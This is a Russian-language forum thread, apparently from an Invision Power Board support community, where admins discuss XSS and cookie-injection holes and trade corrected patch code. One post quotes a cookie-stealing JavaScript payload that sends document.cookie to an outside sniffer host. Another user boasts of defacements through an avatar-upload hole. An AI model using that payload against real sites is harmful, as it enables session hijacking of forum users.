Spear Опубликовано 10 Ноября 2005 Жалоба Поделиться Опубликовано 10 Ноября 2005 (изменено) 1.3 - don't work * * * * * * я непойму, зачем делать кучу регеспов, если можно юзануть РНР функцию htmlentities ()? $text = htmlentities ($text, ENT_QUOTES) да, такой вопрос - где в ИПБ находится тот самый обработчик, к которому постоянно пишут патчи? (немогу найти..) Изменено 10 Ноября 2005 пользователем Spear Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 11 Ноября 2005 Жалоба Поделиться Опубликовано 11 Ноября 2005 /sources/lib/post_parser.php Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 11 Ноября 2005 Жалоба Поделиться Опубликовано 11 Ноября 2005 Актуально для 2.1.3 и ниже. для 2.1.3 не актуально И вообще научитесь нормально постить уязвимости.Их не надо выкладывать на форум, а просто давать ссылку на txt файл, в котором содержится строчка вызывающая XSS. Потом пишете вашу версию форума и итог сработало или нет, и не надо строить предположений о том что уязвимы другие версии, потому как другие люди проверят у которых эти версии. И еще все сниферы javascript:document.images[1].src="http://античат.ru/cgi-bin/s.jpg?"+document.cookieзаменяйте наjavascript:alert(document.cookie) Ссылка на комментарий Поделиться на других сайтах Прочее
Armis Опубликовано 13 Ноября 2005 Жалоба Поделиться Опубликовано 13 Ноября 2005 GiV, проверялось именно на 2.1.3 Ссылка на комментарий Поделиться на других сайтах Прочее
Spear Опубликовано 13 Ноября 2005 Жалоба Поделиться Опубликовано 13 Ноября 2005 я думаю мне за XSS можно уже не волноваться (в постах по крайней мере: Ссылка на комментарий Поделиться на других сайтах Прочее
l0ky Опубликовано 20 Ноября 2005 Жалоба Поделиться Опубликовано 20 Ноября 2005 (изменено) НА днях сложилась такая ситуация: Зашел к себе на форум, а там сообщение написанное от моего имени, что форум имеет уязвимость и небезопасен. Подпись Доброжелатель. (Хорошо хоть доброжелатель попался). Был неприятно удивле, и начал проверять на предмет уязвимостей. Вроде бы все исправления уже были сделаны, но видать где то что то упустил. Написал в это же тему обращение к этому доброжелателю, как он умудрился зайти под моим именем, он мне написал Читай тут.http://dayhack.h15.ru/phpBB2/viewtopic.php?t=22Работает до версии 2.0.4. Думаю разберешься. связан с автологином. Если сможешь заперть, выложи у себя на форуме код. Удачи. Зла не желаю. Дальше я вообще ничего не понял. (Вот такой вот я хреновый админ )Если кто в курсе напишите как сэтим бороться... У меня версия форума 1.3 Изменено 20 Ноября 2005 пользователем l0ky Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 20 Ноября 2005 Жалоба Поделиться Опубликовано 20 Ноября 2005 У тебя не все обновления. Это довольно старая уязвимость... Ссылка на комментарий Поделиться на других сайтах Прочее
ghost46 Опубликовано 20 Ноября 2005 Жалоба Поделиться Опубликовано 20 Ноября 2005 НА днях сложилась такая ситуация: Зашел к себе на форум, а там сообщение написанное от моего имени, что форум имеет уязвимость и небезопасен. Подпись Доброжелатель. (Хорошо хоть доброжелатель попался). Был неприятно удивле, и начал проверять на предмет уязвимостей. Вроде бы все исправления уже были сделаны, но видать где то что то упустил. Написал в это же тему обращение к этому доброжелателю, как он умудрился зайти под моим именем, он мне написал Читай тут.http://dayhack.h15.ru/phpBB2/viewtopic.php?t=22Работает до версии 2.0.4. Думаю разберешься. связан с автологином. Если сможешь заперть, выложи у себя на форуме код. Удачи. Зла не желаю. Дальше я вообще ничего не понял. (Вот такой вот я хреновый админ )Если кто в курсе напишите как сэтим бороться... У меня версия форума 1.3 в данном разделе, найди топик Исправление уязвимостей форумов и отредактируй файлы как там написано - если все сделаешь правильно, то никто больше не взломает А вообще надо следить за обновлениями - я в php и perl тоже как бы слаб, но хотя бы раз в месяц захожу на этот форум, чтобы заглянуть в Исправление уязвимостей форумов Удачи... Ссылка на комментарий Поделиться на других сайтах Прочее
l0ky Опубликовано 20 Ноября 2005 Жалоба Поделиться Опубликовано 20 Ноября 2005 2 NaFigator У тебя не все обновления. Это довольно старая уязвимость... Сегодня проверил ещё раз, вроде бы все. Уже руки опускаются. Может подскажете ссылку на конкретное исправление данной уязвимости. Заранее безмерно благодарен. Ссылка на комментарий Поделиться на других сайтах Прочее
Vic'er Опубликовано 20 Ноября 2005 Жалоба Поделиться Опубликовано 20 Ноября 2005 Сегодня проверил ещё раз, вроде бы все. Уже руки опускаются. Может подскажете ссылку на конкретное исправление данной уязвимости. Заранее безмерно благодарен.Уязвимости форумов Invision Power Board Ссылка на комментарий Поделиться на других сайтах Прочее
l0ky Опубликовано 20 Ноября 2005 Жалоба Поделиться Опубликовано 20 Ноября 2005 Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!! Ссылка на комментарий Поделиться на других сайтах Прочее
Archon7th Опубликовано 12 Декабря 2005 Жалоба Поделиться Опубликовано 12 Декабря 2005 давно я не заходил ... похоже что-то прикольное пропустила где дефейсы ? ... хде их можно посмотреть ? ... проверил всё новое что появилось с моего последнего заходана 131 сработало только с пеносами ... зашил, теперь не работает ... спасибо ... что касаеться ACP Note не совсем разобрался как работает Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 12 Декабря 2005 Жалоба Поделиться Опубликовано 12 Декабря 2005 Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!! Можно попросить админов прокомментировать заявление? Ссылка на комментарий Поделиться на других сайтах Прочее
Destruction Опубликовано 12 Декабря 2005 Жалоба Поделиться Опубликовано 12 Декабря 2005 Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!!Смешно Во-первых я так чувствую Вы совершенно случайно наткнулись на "дыру", если она вообще есть - вот вас от радости и распирает. Опытный взломщик бы просто поставил сниффер и втихую бы жил с довольной харей Что касается дефейсов - Вы знаете, что такое "дефейс"? И почему я не заметил? Я регулярно посещаю форум.. Ссылка на комментарий Поделиться на других сайтах Прочее
l0ky Опубликовано 12 Декабря 2005 Жалоба Поделиться Опубликовано 12 Декабря 2005 Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!! Немного не понял кто это под моим ником влез Посмотрите по IP откуда такой выискался... Ссылка на комментарий Поделиться на других сайтах Прочее
Vic'er Опубликовано 12 Декабря 2005 Жалоба Поделиться Опубликовано 12 Декабря 2005 Немного не понял кто это под моим ником влез Посмотрите по IP откуда такой выискался... Оттуда, откуда и Вы тютелька в тютельку... Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 13 Декабря 2005 Жалоба Поделиться Опубликовано 13 Декабря 2005 Немного не понял кто это под моим ником влез Посмотрите по IP откуда такой выискался... Оттуда, откуда и Вы тютелька в тютельку...Эх... Странные эти фаны воблы... Ссылка на комментарий Поделиться на других сайтах Прочее
l0ky Опубликовано 14 Декабря 2005 Жалоба Поделиться Опубликовано 14 Декабря 2005 Оттуда, откуда и Вы тютелька в тютельку Упс. Вообще-то я нахожусь внутри локальной сети и внешний IP может быть похож у многих пользователей. Интерестно получается. Сегодня позвоню провайдеру узнаю как это могло получиться. Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 5 Января 2006 Жалоба Поделиться Опубликовано 5 Января 2006 (изменено) GIV, Vitaly! В последней найденой уязвимости, последне исправление://$topic_array = array_slice( array_keys( $topics ), 0, 5 );на$topic_array = $std->clean_int_array( $topic_array );неправильное, потому что теряется список просмотренных тем в личных данных. Должно быть:$topic_array = array_slice( array_keys( $std->clean_int_array( $topics ) ), 0, 5 );ну или что-то типа того! Ссылка на предложенное исправление:IPB 2.x.x: Обновление безопасности Изменено 5 Января 2006 пользователем Anna Ссылка на комментарий Поделиться на других сайтах Прочее
dfc_darkman Опубликовано 5 Января 2006 Жалоба Поделиться Опубликовано 5 Января 2006 да да да кстатиу меня такая же фигнявот даже тему открыл отдельную По поводу новой уязвимости. Глюк после исправления. Ссылка на комментарий Поделиться на других сайтах Прочее
IBResource Опубликовано 5 Января 2006 Жалоба Поделиться Опубликовано 5 Января 2006 GIV, Vitaly! В последней найденой уязвимости, последне исправление://$topic_array = array_slice( array_keys( $topics ), 0, 5 );на$topic_array = $std->clean_int_array( $topic_array );неправильное, потому что теряется список просмотренных тем в личных данных. Должно быть:$topic_array = array_slice( array_keys( $std->clean_int_array( $topics ) ), 0, 5 );ну или что-то типа того! Ссылка на предложенное исправление:IPB 2.x.x: Обновление безопасности Верно, там добавление строки после, а не замена... Ссылка на комментарий Поделиться на других сайтах Прочее
cthulhu Опубликовано 5 Января 2006 Жалоба Поделиться Опубликовано 5 Января 2006 Для версий IPB 2.0.x: Файл sources\functions.php, найти код:$ibforums->forum_read[$id] = $stamp;заменить на:$this->forum_read[ intval($id) ] = intval($stamp);еще одна ошибочка, если я ничего не путаю:заменять надо на $ibforums->forum_read[ intval($id) ] = intval($stamp); Ссылка на комментарий Поделиться на других сайтах Прочее
IBResource Опубликовано 5 Января 2006 Жалоба Поделиться Опубликовано 5 Января 2006 Для версий IPB 2.0.x: Файл sources\functions.php, найти код:$ibforums->forum_read[$id] = $stamp;заменить на:$this->forum_read[ intval($id) ] = intval($stamp);еще одна ошибочка, если я ничего не путаю:заменять надо на $ibforums->forum_read[ intval($id) ] = intval($stamp); Верно. 2 раза пришлось писать Matt'у. Ух, ленится он все перепроверить... Ссылка на комментарий Поделиться на других сайтах Прочее
borchuk Опубликовано 6 Января 2006 Жалоба Поделиться Опубликовано 6 Января 2006 После исправления последней уязвимости иногда вылазит следущее:ПРЕДУПРЕЖДЕНИЕ IPB [2] Invalid argument supplied for foreach() (Файл: /sources/functions.php. Строка: 1911) На той самой строчке - функция добавленная при исправлении /*-------------------------------------------------------------------------*/ // Makes topics read or forum read cookie safe /*-------------------------------------------------------------------------*/ /** * Makes int based arrays safe * XSS Fix: Ticket: 243603 * Problem with cookies allowing SQL code in keys * * @param array Array * @return array Array (Cleaned) * @since 2.1.4(A) */ function clean_int_array( $array=array() ) { $return = array(); foreach( $array as $k => $v ) { $return[ intval($k) ] = intval($v); } return $return; } Появляется периодически (не всегда) при "Перейти к последнему непрочитанному сообщению" ... У кого нибудь ещё было? Как бороться? P.S. Проверено неоднократно. Все изменения сделаланы правильно. Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 6 Января 2006 Жалоба Поделиться Опубликовано 6 Января 2006 $return = array(); if ( !count( $array ) ) return $return; foreach( $array as $k => $v ) { $return[ intval($k) ] = intval($v); } Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения